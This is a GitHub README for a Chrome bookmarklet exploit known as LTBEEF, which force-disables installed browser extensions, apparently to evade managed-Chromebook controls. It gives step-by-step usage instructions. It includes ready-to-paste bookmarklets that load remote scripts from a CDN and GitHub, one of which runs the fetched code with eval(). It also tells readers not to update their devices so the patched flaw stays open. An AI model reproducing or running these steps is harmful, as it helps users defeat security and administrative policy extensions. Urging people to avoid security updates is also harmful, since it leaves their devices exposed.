Skip to content

Latest commit

 

History

History
83 lines (54 loc) · 3.53 KB

README.md

File metadata and controls

83 lines (54 loc) · 3.53 KB

ext remover

image

Bookmarklet exploit that can force-disable any extension installed on Google Chrome. Also known as LTBEEF.

DO NOT UPDATE YOUR CHROMEBOOK! This exploit has been patched, so do not update!

If you need any help, please go here: https://github.com/3kh0/ext-remover/discussions

Instructions

Here are the instructions to using this exploit! There are two ways, using the GUI and using the ids, the GUI method is better

Ingot (GUI)

Credit to Nebelung for this, link to the github

For easy setup go the the website at https://fognetwork.github.io/Ingot

  1. Show your bookmarks bar with ctrl + shift + b
  2. Right click on the bar and choose Add Page
  3. Set the name to Ingot and the URL to the code below or here
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())

If this helped please give me a star!

image

Using the GUI

Credit to CompactCow#4717 for the amazing UI!

  1. Right click on the bar and choose Add Page
  2. Set the name to GUI and the URL to the code below or here
javascript:fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
  1. Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
  2. Click the bookmark (Make sure you are on the page above!)
  3. Use the menu to toggle your extensions!

If this helped please give me a star!

image

Using IDs

Disabling

  1. Visit chrome://extensions and on the extension you want to disable click on Details
  2. Copy the text in the URL after the ?id=

For example if you have this URL: chrome://extensions/?id=echoontop you would only copy echoontop

  1. Go to the file bookmark.js and copy everything and create a new bookmark and use the code you copied as the Page URL
  2. Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
  3. Click the bookmark (Make sure you are on the page above!)
  4. Put the ID you copied into the text box.

You're done! The extension should now be disabled.

If this helped please give me a star!

Enabling

  1. Visit chrome://extensions and on the extension you want to enable click on Details
  2. Click View in Chrome Web Store
  3. You will see a banner at the top of the page that says This item has been disabled in Chrome. Enable this item
  4. Click on Enable this item

You're done! The extension should now be enabled.

If this helped please give me a star!

Credit bypassi for finding and making this exploit!

So... How does it work? Well, it's pretty basic. It finds extensions and displays them on this page with some toggle switches image

then, it detects when the toggle switch is toggled, and for what extension, then compiles a message to chrome that says "hey, turn this off for me". Chrome, mistaking this for the webstore complies. image